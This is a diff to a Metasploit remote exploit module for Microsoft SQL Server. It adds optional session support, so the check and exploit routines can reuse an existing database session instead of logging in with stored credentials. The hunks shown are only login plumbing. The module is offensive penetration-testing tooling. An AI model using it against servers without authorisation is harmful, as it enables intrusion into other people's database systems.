@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::MSSQL
   include Msf::Exploit::CmdStager
+  include Msf::OptionalSession::MSSQL
   #include Msf::Exploit::CmdStagerDebugAsm
   #include Msf::Exploit::CmdStagerDebugWrite
   #include Msf::Exploit::CmdStagerTFTP
@@ -68,9 +69,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    if !mssql_login_datastore
-      vprint_status("Invalid SQL Server credentials")
-      return Exploit::CheckCode::Detected
+    if session
+      set_session(session.client)
+    else
+      unless mssql_login_datastore
+        vprint_status("Invalid SQL Server credentials")
+        return Exploit::CheckCode::Detected
+      end
     end
 
     mssql_query("select @@version", true)
@@ -90,10 +95,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-
-    if !mssql_login_datastore
-      print_status("Invalid SQL Server credentials")
-      return
+    if session
+      set_session(session.client)
+    else
+      unless mssql_login_datastore
+        print_status("Invalid SQL Server credentials")
+        return
+      end
     end
 
     method = datastore['METHOD'].downcase
